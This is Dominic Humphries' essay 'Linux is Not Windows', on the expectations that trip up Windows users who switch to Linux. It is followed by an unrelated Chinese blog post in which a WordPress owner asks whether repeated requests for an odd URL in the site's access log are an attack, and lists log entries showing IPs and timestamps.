The specific reasons why people try Linux vary wildly, but the overall reason boils down to one thing: They hope Linux will be better than Windows. Common yardsticks for measuring success are cost, choice, performance, and security. There are many others. But every Windows user who tries Linux, does so because they hope it will be better than what they've got.

Therein lies the problem.

It is logically impossible for any thing to be better than any other thing whilst remaining completely identical to it. A perfect copy may be equal, but it can never surpass. So when you gave Linux a try in hopes that it would be better, you were inescapably hoping that it would be different. Too many people ignore this fact, and hold up every difference between the two OSes as a Linux failure.

As a simple example, consider driver upgrades: one typically upgrades a hardware driver on Windows by going to the manufacturer's website and downloading the new driver; whereas in Linux you upgrade the kernel.

This means that a single Linux download & upgrade will give you the newest drivers available for your machine, whereas in Windows you would have to surf to multiple sites and download all the upgrades individually. It's a very different process, but it's certainly not a bad one. But many people complain because it's not what they're used to.

Or, as an example you're more likely to relate to, consider Firefox: One of the biggest open-source success stories. A web browser that took the world by storm. Did it achieve this success by being a perfect imitation of IE, the then-most-popular browser?

No. It was successful because it was better than IE, and it was better because it was different. It had tabbed browsing, live bookmarks, built-in searchbar, PNG support, adblock extensions, and other wonderful things. The "Find" functionality appeared in a toolbar at the bottom and looked for matches as you typed, turning red when you had no match. IE had no tabs, no RSS functionality, searchbars only via third-party extensions, and a find dialogue that required a click on "OK" to start looking and a click on "OK" to clear the "Not found" error message. A clear and inarguable demonstration of an open-source application achieving success by being better, and being better by being different. Had FF been an IE clone, it would have vanished into obscurity. And had Linux been a Windows clone, the same would have happened.

So the solution to problem #1: Remember that where Linux is familiar and the same as what you're used to, it isn't new & improved. Welcome the places where things are different, because only here does it have a chance to shine.

Problem #2: Linux is too different from Windows

The next issue arises when people do expect Linux to be different, but find that some differences are just too radical for their liking. Probably the biggest example of this is the sheer amount of choice available to Linux users. Whereas an out-of-the-box-Windows user has the Classic or XP desktop with Wordpad, Internet Explorer, and Outlook Express installed, an out-of-the-box-Linux user has hundreds of distros to choose from, then Gnome or KDE or Fluxbox or whatever, with vi or emacs or kate, Konqueror or Opera or Firefox or Mozilla, and so on and so forth.

A Windows user isn't used to making so many choices just to get up & running. Exasperated "Does there have to be so much choice?" posts are very common.

Does Linux really have to be so different from Windows? After all, they're both operating systems. They both do the same job: Power your computer & give you something to run applications on. Surely they should be more or less identical?

Look at it this way: Step outside and take a look at all the different vehicles driving along the road. These are all vehicles designed with more or less the same purpose: To get you from A to B via the roads. Note the variety in designs.

But, you may be thinking, car differences are really quite minor: they all have a steering wheel, foot-pedal controls, a gear stick, a handbrake, windows & doors, a petrol tank. . . If you can drive one car, you can drive any car!

Quite true. But did you not see that some people weren't driving cars, but were riding motorbikes instead. . ?

Switching from one version of Windows to another is like switching from one car to another. Win95 to Win98, I honestly couldn't tell the difference. Win98 to WinXP, it was a bigger change but really nothing major.

But switching from Windows to Linux is like switching from a car to a motorbike. They may both be OSes/road vehicles. They may both use the same hardware/roads. They may both provide an environment for you to run applications/transport you from A to B. But they use fundamentally different approaches to do so.

Windows/cars are not safe from viruses/theft unless you install an antivirus/lock the doors. Linux/motorbikes don't have viruses/doors, so are perfectly safe without you having to install an antivirus/lock any doors.

Or look at it the other way round:

Linux/cars were designed from the ground up for multiple users/passengers. Windows/motorbikes were designed for one user/passenger. Every Windows user/motorbike driver is used to being in full control of his computer/vehicle at all times. A Linux user/car passenger is used to only being in control of his computer/vehicle when logged in as root/sitting in the driver's seat.

Two different approaches to fulfilling the same goal. They differ in fundamental ways. They have different strengths and weaknesses: A car is the clear winner at transporting a family & a lot of cargo from A to B: More seats & more storage space. A motorbike is the clear winner at getting one person from A to B: Less affected by congestion and uses less fuel.

There are many things that don't change when you switch between cars and motorbikes: You still have to put petrol in the tank, you still have to drive on the same roads, you still have to obey the traffic lights and Stop signs, you still have to indicate before turning, you still have to obey the same speed limits.

But there are also many things that do change: Car drivers don't have to wear crash helmets, motorbike drivers don't have to put on a seatbelt. Car drivers have to turn the steering wheel to get around a corner, motorbike drivers have to lean over. Car drivers accelerate by pushing a foot-pedal, motorbike drivers accelerate by twisting a hand control.

A motorbike driver who tries to corner a car by leaning over is going to run into problems very quickly. And Windows users who try to use their existing skills and habits generally also find themselves having many issues. In fact, Windows "Power Users" frequently have more problems with Linux than people with little or no computer experience, for this very reason. Typically, the most vehement "Linux is not ready for the desktop yet" arguments come from ingrained Windows users who reason that if they couldn't make the switch, a less-experienced user has no chance. But this is the exact opposite of the truth.

So, to avoid problem #2: Don't assume that being a knowledgeable Windows user means you're a knowledgeable Linux user: When you first start with Linux, you are a novice.

Problem #3: Culture shock

Subproblem #3a: There is a culture

Windows users are more or less in a customer-supplier relationship: They pay for software, for warranties, for support, and so on. They expect software to have a certain level of usability. They are therefore used to having rights with their software: They have paid for technical support and have every right to demand that they receive it. They are also used to dealing with entities rather than people: Their contracts are with a company, not with a person.

Linux users are in more of a community. They don't have to buy the software, they don't have to pay for technical support. They download software for free & use Instant Messaging and web-based forums to get help. They deal with people, not corporations.

A Windows user will not endear himself by bringing his habitual attitudes over to Linux, to put it mildly.

The biggest cause of friction tends to be in the online interactions: A "3a" user new to Linux asks for help with a problem he's having. When he doesn't get that help at what he considers an acceptable rate, he starts complaining and demanding more help. Because that's what he's used to doing with paid-for tech support. The problem is that this isn't paid-for support. This is a bunch of volunteers who are willing to help people with problems out of the goodness of their hearts. The new user has no right to demand anything from them, any more than somebody collecting for charity can demand larger donations from contributors.

In much the same way, a Windows user is used to using commercial software. Companies don't release software until it's reliable, functional, and user-friendly enough. So this is what a Windows user tends to expect from software: It starts at version 1.0. Linux software, however, tends to get released almost as soon as it's written: It starts at version 0.1. This way, people who really need the functionality can get it ASAP; interested developers can get involved in helping improve the code; and the community as a whole stays aware of what's going on.

If a "3a" user runs into trouble with Linux, he'll complain: The software hasn't met his standards, and he thinks he has a right to expect that standard. His mood won't be improved when he gets sarcastic replies like "I'd demand a refund if I were you"

So, to avoid problem #3a: Simply remember that you haven't paid the developer who wrote the software or the people online who provide the tech support. They don't owe you anything.

Subproblem #3b: New vs. Old

Linux pretty much started out life as a hacker's hobby. It grew as it attracted more hobbyist hackers. It was quite some time before anybody but a geek stood a chance of getting a useable Linux installation working easily. Linux started out "By geeks, for geeks." And even today, the majority of established Linux users are self-confessed geeks.

And that's a pretty good thing: If you've got a problem with hardware or software, having a large number of geeks available to work on the solution is a definite plus.

But Linux has grown up quite a bit since its early days. There are distros that almost anybody can install, even distros that live on CDs and detect all your hardware for you without any intervention. It's become attractive to non-hobbyist users who are just interested in it because it's virus-free and cheap to upgrade. It's not uncommon for there to be friction between the two camps. It's important to bear in mind, however, that there's no real malice on either side: It's lack of understanding that causes the problems.

Firstly, you get the hard-core geeks who still assume that everybody using Linux is a fellow geek. This means they expect a high level of knowledge, and often leads to accusations of arrogance, elitism, and rudeness. And in truth, sometimes that's what it is. But quite often, it's not: It's elitist to say "Everybody ought to know this". It's not elitist to say "Everybody knows this" - quite the opposite.

Secondly, you get the new users who're trying to make the switch after a lifetime of using commercial OSes. These users are used to software that anybody can sit down & use, out-of-the-box.

The issues arise because group 1 is made up of people who enjoy being able to tear their OS apart and rebuild it the way they like it, while group 2 tends to be indifferent to the way the OS works, so long as it does work.

A parallel situation that can emphasize the problems is Lego. Picture the following:

New: I wanted a new toy car, and everybody's raving about how great Lego cars can be. So I bought some Lego, but when I got home, I just had a load of bricks and cogs and stuff in the box. Where's my car??

Old: You have to build the car out of the bricks. That's the whole point of Lego.

New: What?? I don't know how to build a car. I'm not a mechanic. How am I supposed to know how to put it all together??

Old: There's a leaflet that came in the box. It tells you exactly how to put the bricks together to get a toy car. You don't need to know how, you just need to follow the instructions.

New: Okay, I found the instructions. It's going to take me hours! Why can't they just sell it as a toy car, instead of making you have to build it??

Old: Because not everybody wants to make a toy car with Lego. It can be made into anything we like. That's the whole point.

New: I still don't see why they can't supply it as a car so people who want a car have got one, and other people can take it apart if they want to. Anyway, I finally got it put together, but some bits come off occasionally. What do I do about this? Can I glue it?

Old: It's Lego. It's designed to come apart. That's the whole point.

New: But I don't want it to come apart. I just want a toy car!

Old: Then why on Earth did you buy a box of Lego??

It's clear to just about anybody that Lego is not really aimed at people who just want a toy car. You don't get conversations like the above in real life. The whole point of Lego is that you have fun building it and you can make anything you like with it. If you've no interest in building anything, Lego's not for you. This is quite obvious.

As far as the long-time Linux user is concerned, the same holds true for Linux: It's an open-source, fully-customizeable set of software. That's the whole point. If you don't want to hack the components a bit, why bother to use it?

But there's been a lot of effort lately to make Linux more suitable for the non-hackers, a situation that's not a million miles away from selling pre-assembled Lego kits, in order to make it appeal to a wider audience. Hence you get conversations that aren't far away from the ones above: Newcomers complain about the existence of what the established users consider to be fundamental features, and resent having the read a manual to get something working.  But complaining that there are too many distros; or that software has too many configuration options; or that it doesn't work perfectly out-of-the-box; is like complaining that Lego can be made into too many models, and not liking the fact that it can be broken down into bricks and built into many other things.

So, to avoid problem #3b: Just remember that what Linux seems to be now is not what Linux was in the past. The largest and most necessary part of the Linux community, the hackers and the developers, like Linux because they can fit it together the way they like; they don't like it in spite of having to do all the assembly before they can use it.

Problem #4: Designed for the designer

In the car industry, you'll very rarely find that the person who designed the engine also designed the car interior: It calls for totally different skills. Nobody wants an engine that only looks like it can go fast, and nobody wants an interior that works superbly but is cramped and ugly. And in the same way, in the software industry, the user interface (UI) is not usually created by the people who wrote the software.

In the Linux world, however, this is not so much the case: Projects frequently start out as one man's toy. He does everything himself, and therefore the interface has no need of any kind of "user friendly" features: The user knows everything there is to know about the software, he doesn't need help. Vi is a good example of software deliberately created for a user who already knows how it works: It's not unheard of for new users to reboot their computers because they couldn't figure out how else to get out of vi.

However, there is an important difference between a FOSS programmer and most commercial software writers: The software a FOSS programmer creates is software that he intends to use. So whilst the end result might not be as 'comfortable' for the novice user, they can draw some comfort in knowing that the software is designed by somebody who knows what the end-users needs are: He too is an end-user. This is very different from commercial software writers, who are making software for other people to use: They are not knowledgeable end-users.

So whilst vi has an interface that is hideously unfriendly to new users, it is still in use today because it is such a superb interface once you know how it works. Firefox was created by people who regularly browse the Web. The Gimp was built by people who use it to manipulate graphics files. And so on.

So Linux interfaces are frequently a bit of a minefield for the novice: Despite its popularity, vi should never be considered by a new user who just wants to quickly make a few changes to a file. And if you're using software early in its lifecycle, a polished, user-friendly interface is something you're likely to find only in the "ToDo" list: Functionality comes first. Nobody designs a killer interface and then tries to add functionality bit by bit. They create functionality, and then improve the interface bit by bit.

So to avoid #4 issues: Look for software that's specifically aimed at being easy for new users to use, or accept that some software that has a steeper learning curve than you're used to. To complain that vi isn't friendly enough for new users is to be laughed at for missing the point.

Problem #5: The myth of "user-friendly"

This is a big one. It's a very big term in the computing world, "user-friendly". It's even the name of a particularly good webcomic. But it's a bad term.

The basic concept is good: That software be designed with the needs of the user in mind. But it's always addressed as a single concept, which it isn't.

If you spend your entire life processing text files, your ideal software will be fast and powerful, enabling you to do the maximum amount of work for the minimum amount of effort. Simple keyboard shortcuts and mouseless operation will be of vital importance.

But if you very rarely edit text files, and you just want to write an occasional letter, the last thing you want is to struggle with learning keyboard shortcuts. Well-organized menus and clear icons in toolbars will be your ideal.

Clearly, software designed around the needs of the first user will not be suitable for the second, and vice versa. So how can any software be called "user-friendly", if we all have different needs?

The simple answer: User-friendly is a misnomer, and one that makes a complex situation seem simple.

What does "user-friendly" really mean? Well, in the context in which it is used, "user friendly" software means "Software that can be used to a reasonable level of competence by a user with no previous experience of the software." This has the unfortunate effect of making lousy-but-familiar interfaces fall into the category of "user-friendly".

Subproblem #5a: Familiar is friendly

So it is that in most "user-friendly" text editors & word processors, you Cut and Paste by using Ctrl-X and Ctrl-V. Totally unintuitive, but everybody's used to these combinations, so they count as a "friendly" combination.

So when somebody comes to vi and finds that it's "d" to cut, and "p" to paste, it's not considered friendly: It's not what anybody is used to.

Is it superior? Well, actually, yes.

With the Ctrl-X approach, how do you cut a word from the document you're currently in? (No using the mouse!)

From the start of the word, Ctrl-Shift-Right to select the word.
Then Ctrl-X to cut it.

The vi approach? dw deletes the word.

How about cutting five words with a Ctrl-X application?

From the start of the words, Ctrl-Shift-Right
Ctrl-Shift-Right
Ctrl-Shift-Right
Ctrl-Shift-Right
Ctrl-Shift-Right
Ctrl-X

And with vi?

d5w

The vi approach is far more versatile and actually more intuitive: "X" and "V" are not obvious or memorable "Cut" and "Paste" commands, whereas "dw" to delete a word, and "p" to put it back is perfectly straightforward. But "X" and "V" are what we all know, so whilst vi is clearly superior, it's unfamiliar. Ergo, it is considered unfriendly. On no other basis, pure familiarity makes a Windows-like interface seem friendly. And as we learned in problem #1, Linux is necessarily different to Windows. Inescapably, Linux always appears less "user-friendly" than Windows.

To avoid #5a problems, all you can really do is try and remember that "user-friendly" doesn't mean "What I'm used to": Try doing things your usual way, and if it doesn't work, try and work out what a total novice would do.

Subproblem #5b: Inefficient is friendly

This is a sad but inescapable fact. Paradoxically, the harder you make it to access an application's functionality, the friendlier it can seem to be.

This is because friendliness is added to an interface by using simple, visible 'clues' - the more, the better. After all, if a complete novice to computers is put in front of a WYSIWYG word processor and asked to make a bit of text bold, which is more likely:

  • He'll guess that "Ctrl-B" is the usual standard
  • He'll look for clues, and try clicking on the "Edit" menu. Unsuccessful, he'll try the next likely one along the row of menus: "Format". The new menu has a "Font" option, which seems promising. And Hey! There's our "Bold" option. Success!

Next time you do any processing, try doing every job via the menus: No shortcut keys, and no toolbar icons. Menus all the way. You'll find you slow to a crawl, as every task suddenly demands a multitude of keystrokes/mouseclicks.

Making software "user-friendly" in this fashion is like putting training wheels on a bicycle: It lets you get up & running immediately, without any skill or experience needed. It's perfect for a beginner. But nobody out there thinks that all bicycles should be sold with training wheels: If you were given such a bicycle today, I'll wager the first thing you'd do is remove them for being unnecessary encumbrances: Once you know how to ride a bike, training wheels are unnecessary.

And in the same way, a great deal of Linux software is designed without "training wheels" - it's designed for users who already have some basic skills in place. After all, nobody's a permanent novice: Ignorance is short-lived, and knowledge is forever. So the software is designed with the majority in mind.

This might seem an excuse: After all, MS Word has all the friendly menus, and it has toolbar buttons, and it has shortcut keys. . . Best of all worlds, surely? Friendly and efficient.

However, this has to be put into perspective: Firstly, the practicalities: having menus and toolbars and shortcuts and all would mean a lot of coding, and it's not like Linux developers all get paid for their time. Secondly, it still doesn't really take into account serious power-users: Very few professional wordsmiths use MS Word. Ever meet a coder who used MS Word? Compare that to how many use emacs & vi.

Why is this? Firstly, because some "friendly" behaviour rules out efficient behaviour: See the "Cut&Copy" example above. And secondly, because most of Word's functionality is buried in menus that you have to use: Only the most common functionality has those handy little buttons in toolbars at the top. The less-used functions that are still vital for serious users just take too long to access.

Something to bear in mind, however, is that "training wheels" are often available as "optional extras" for Linux software: They might not be obvious, but frequently they're available.

Take mplayer. You use it to play a video file by typing mplayer filename in a terminal. You fastforward & rewind using the arrow keys and the PageUp & PageDown keys. This is not overly "user-friendly". However, if you instead type gmplayer filename, you'll get the graphical frontend, with all its nice, friendly , familiar buttons.

Take ripping a CD to MP3 (or Ogg): Using the command-line, you need to use cdparanoia to rip the files to disc. Then you need an encoder. . . It's a hassle, even if you know exactly how to use the packages (imho). So download & install something like Grip. This is an easy-to-use graphical frontend that uses cdparanoia and encoders behind-the-scenes to make it really easy to rip CDs, and even has CDDB support to name the files automatically for you.

The same goes for ripping DVDs: The number of options to pass to transcode is a bit of a nightmare. But using dvd::rip to talk to transcode for you makes the whole thing a simple, GUI-based process which anybody can do.

So to avoid #5b issues: Remember that "training wheels" tend to be bolt-on extras in Linux, rather than being automatically supplied with the main product. And sometimes, "training wheels" just can't be part of the design.

Problem #6: Imitation vs. Convergence

An argument people often make when they find that Linux isn't the Windows clone they wanted is to insist that this is what Linux has been (or should have been) attempting to be since it was created, and that people who don't recognise this and help to make Linux more Windows-like are in the wrong. They draw on many arguments for this:

Linux has gone from Command-Line- to Graphics-based interfaces, a clear attempt to copy Windows

Nice theory, but false: The original X windowing system was released in 1984, as the successor to the W windowing system ported to Unix in 1983. Windows 1.0 was released in 1985. Windows didn't really make it big until version 3, released in 1990 - by which time, X windows had for years been at the X11 stage we use today. Linux itself was only started in 1991. So Linux didn't create a GUI to copy Windows: It simply made use of a GUI that existed long before Windows.

Windows 3 gave way to Windows 95 - making a huge level of changes to the UI that Microsoft has never equalled since. It had many new & innovative features: Drag & drop functionality; taskbars, and so on. All of which have since been copied by Linux, of course.

Actually. . . no. All the above existed prior to Microsoft making use of them. NeXTSTeP in particular was a hugely advanced (for the time) GUI, and it predated Win95 significantly - version 1 released in 1989, and the final version in 1995.

Okay, okay, so Microsoft didn't think up the individual features that we think of as the Windows Look-and-Feel. But it still created a Look-and-Feel, and Linux has been trying to imitate that ever since.

To debunk this, one must discuss the concept of convergent evolution. This is where two completely different and independent systems evolve over time to become very similar. It happens all the time in biology. For example, sharks and dolphins. Both are (typically) fish-eating marine organisms of about the same size. Both have dorsal fins, pectoral fins, tail fins, and similar, streamlined shapes.

However, sharks evolved from fish, while dolphins evolved from a land-based quadrupedal mammal of some sort. The reason they have very similar overall appearances is that they both evolved to be as efficient as possible at living within a marine environment. At no stage did pre-dolphins (the relative newcomers) look at sharks and think "Wow, look at those fins. They work really well. I'll try and evolve some myself!"

Similarly, it's perfectly true to look at early Linux desktops and see FVWM and TWM and a lot of other simplistic GUIs. And then look at modern Linux desktops, and see Gnome & KDE with their taskbars and menus and eye-candy. And yes, it's true to say that they're a lot more like Windows than they used to be.

But then, so is Windows: Windows 3.0 had no taskbar that I remember. And the Start menu? What Start menu?

Linux didn't have a desktop anything like modern Windows. Microsoft didn't either. Now they both do. What does this tell us?

It tells us that developers in both camps looked for ways of improving the GUI, and because there are only a limited number of solutions to a problem, they often used very similar methods. Similarity does not in any way prove or imply imitation. Remembering that will help you avoid straying into problem #6 territory.

Problem #7: That FOSS thing.

Oh, this causes problems. Not intrinsically: The software being free and open-source is a wonderful and immensely important part of the whole thing. But understanding just how different FOSS is from proprietary software can be too big an adjustment for some people to make.

I've already mentioned some instances of this: People thinking they can demand technical support and the like. But it goes far beyond that.

Microsoft's Mission Statement is "A computer on every desktop" - with the unspoken rider that each computer should be running Windows. Microsoft and Apple both sell operating systems, and both do their utmost to make sure their products get used by the largest number of people: They're businesses, out to make money.

And then there is FOSS. Which, even today, is almost entirely non-commercial.

Before you reach for your email client to tell me about Red Hat, Suse, Linspire and all: Yes, I know they "sell" Linux. I know they'd all love Linux to be adopted universally, especially their own flavour of it. But don't confuse the suppliers with the manufacturers. The Linux kernel was not created by a company, and is not maintained by people out to make a profit with it. The GNU tools were not created by a company, and are not maintained by people out to make a profit with them. The X11 windowing system. . . well, the most popular implementation is xorg right now, and the ".org" part should tell you all you need to know. Desktop software: Well, you might be able to make a case for KDE being commercial, since it's Qt-based. But Gnome, Fluxbox, Enlightenment, etc. are all non-profit. There are people out to sell Linux, but they are very much the minority.

Increasing the number of end-users of proprietary software leads to a direct financial benefit to the company that makes it. This is simply not the case for FOSS: There is no direct benefit to any FOSS developer in increasing the userbase. Indirect benefits, yes: Personal pride; an increased potential for finding bugs; more likelihood of attracting new developers; possibly a chance of a good job offer; and so on.

But Linus Torvalds doesn't make money from increased Linux usage. Richard Stallman doesn't get money from increased GNU usage. All those servers running OpenBSD and OpenSSH don't put a penny into the OpenBSD project's pockets. And so we come to the biggest problem of all when it comes to new users and Linux:

They find out they're not wanted.

New users come to Linux after spending their lives using an OS where the end-user's needs are paramount, and "user friendly" and "customer focus" are considered veritable Holy Grails. And they suddenly find themselves using an OS that still relies on 'man' files, the command-line, hand-edited configuration files, and Google. And when they complain, they don't get coddled or promised better things: They get bluntly shown the door.

That's an exaggeration, of course. But it is how a lot of potential Linux converts perceived things when they tried and failed to make the switch.

In an odd way, FOSS is actually a very selfish development method: People only work on what they want to work on, when they want to work on it. Most people don't see any need to make Linux more attractive to inexperienced end-users: It already does what they want it to do, why should they care if it doesn't work for other people?

FOSS has many parallels with the Internet itself: You don't pay the writer of a webpage/the software to download and read/install it. Ubiquitous broadband/User-friendly interfaces are of no great interest to somebody who already has broadband/knows how to use the software. Bloggers/developers don't need to have lots of readers/users to justify blogging/coding. There are lots of people making lots of money off it, but it's not by the old-fashioned "I own this and you have to pay me if you want some of it" method that most businesses are so enamoured of; it's by providing services like tech-support/e-commerce.

Linux is not interested in market share. Linux does not have customers. Linux does not have shareholders, or a responsibility to the bottom line. Linux was not created to make money. Linux does not have the goal of being the most popular and widespread OS on the planet.

All the Linux community wants is to create a really good, fully-featured, free operating system. If that results in Linux becoming a hugely popular OS, then that's great. If that results in Linux having the most intuitive, user-friendly interface ever created, then that's great. If that results in Linux becoming the basis of a multi-billion dollar industry, then that's great.

It's great, but it's not the point. The point is to make Linux the best OS that the community is capable of making. Not for other people: For itself. The oh-so-common threats of "Linux will never take over the desktop unless it does such-and-such" are simply irrelevant: The Linux community isn't trying to take over the desktop. They really don't care if it gets good enough to make it onto your desktop, so long as it stays good enough to remain on theirs. The highly-vocal MS-haters, pro-Linux zealots, and money-making FOSS purveyors might be loud, but they're still minorities.

That's what the Linux community wants: an OS that can be installed by whoever really wants it. So if you're considering switching to Linux, first ask yourself what you really want.

If you want an OS that doesn't chauffeur you around, but hands you the keys, puts you in the driver's seat, and expects you to know what to do: Get Linux. You'll have to devote some time to learning how to use it, but once you've done so, you'll have an OS that you can make sit up and dance.

If you really just want Windows without the malware and security issues: Read up on good security practices; install a good firewall, malware-detector, and anti-virus; replace IE with a more secure browser; and keep yourself up-to-date with security updates. There are people out there (myself included) who've used Windows since 3.1 days right through to XP without ever being infected with a virus or malware: you can do it too. Don't get Linux: It will fail miserably at being what you want it to be.

If you really want the security and performance of a Unix-based OS but with a customer-focussed attitude and an world-renowned interface: Buy an Apple Mac. OS X is great. But don't get Linux: It will not do what you want it to do.

It's not just about "Why should I want Linux?". It's also about "Why should Linux want me?"


If you want to leave any feedback about this article, comment on my blog.

This work is copyright 24/05/06 and belongs to Dominic Humphries. It may be redistributed under a Creative Commons License: The URL http://linux.oneandoneis2.org/LNW.htm must supplied in attribution.

英文版出处 http://linux.oneandoneis2.org/LNW.htm

wordpress访问记录里有这样的请求,不知是不是攻击型请求:/archives/+$(j(c))+

查看wordpress访问日志,是通过插件记录到mysql数据库里的,查阅比较方便(实现方法参看这里

无意中发现里面有这样的一个访问,请求页面url很怪

/archives/+$(j(c))+

该请求的user-agent是空的,httpreferer也是空的,在整个记录表里查询,还很多,一百多条,列部分于文后。

不知这样的请求是否是利用wordpress的某个漏洞而对wordpress的攻击,浏览器打开这样的地址,显示404页面,没其它异常情况 ,不知有没有哪位高手可以解答一下。

id     referer     url     time     ip     client     cookie
188834           /tn/archives/+$(j(c))+     2010-08-02 19:23:32     113.108.81.48
189859           /tn/archives/+$(j(c))+     2010-08-03 08:10:35     183.60.2.14
190683           /tn/archives/+$(j(c))+     2010-08-03 22:08:43     113.108.81.48
190835           /tn/archives/+$(j(c))+     2010-08-03 23:30:31     113.108.81.48
191457           /tn/archives/+$(j(c))+     2010-08-04 08:34:47     121.14.94.23
192659           /tn/archives/+$(j(c))+     2010-08-05 06:53:53     119.147.7.231
193517           /tn/archives/+$(j(c))+     2010-08-05 19:31:49     183.60.2.14
195123           /tn/archives/+$(j(c))+     2010-08-06 20:16:23     113.108.91.94
195185           /tn/archives/+$(j(c))+     2010-08-06 21:17:56     113.108.91.95
196435           /tn/archives/+$(j(c))+     2010-08-07 18:55:59     113.108.91.94
197866           /tn/archives/+$(j(c))+     2010-08-08 20:42:39     113.108.81.39
197893           /tn/archives/+$(j(c))+     2010-08-08 20:58:55     183.60.2.14
199258           /tn/archives/+$(j(c))+     2010-08-09 17:55:33     183.60.2.17
199272           /tn/archives/+$(j(c))+     2010-08-09 18:06:24     113.108.91.91
199659           /tn/archives/+$(j(c))+     2010-08-09 23:49:02     183.60.2.14
200895           /tn/archives/+$(j(c))+     2010-08-10 18:24:20     183.60.2.14
201412           /tn/archives/+$(j(c))+     2010-08-11 00:32:11     119.147.11.115
201878           /tn/archives/+$(j(c))+     2010-08-11 08:23:52     183.60.2.17
202709           /tn/archives/+$(j(c))+     2010-08-11 18:58:22     113.108.91.94
203309           /tn/archives/+$(j(c))+     2010-08-12 02:01:41     113.108.81.39
204605           /tn/archives/+$(j(c))+     2010-08-12 19:57:20     183.60.2.15
204655           /tn/archives/+$(j(c))+     2010-08-12 20:21:02     183.60.2.17
204667           /tn/archives/+$(j(c))+     2010-08-12 20:26:13     183.60.2.17
205119           /tn/archives/+$(j(c))+     2010-08-13 01:56:03     183.60.2.15
205352           /tn/archives/+$(j(c))+     2010-08-13 04:58:47     113.108.91.95
206956           /tn/archives/+$(j(c))+     2010-08-14 06:14:02     113.108.81.39
207067           /tn/archives/+$(j(c))+     2010-08-14 07:07:35     113.108.81.39
207676           /tn/archives/+$(j(c))+     2010-08-14 17:43:52     183.60.2.14
208101           /tn/archives/+$(j(c))+     2010-08-15 00:36:21     113.108.91.94
209681           /tn/archives/+$(j(c))+     2010-08-16 00:57:53     183.60.2.15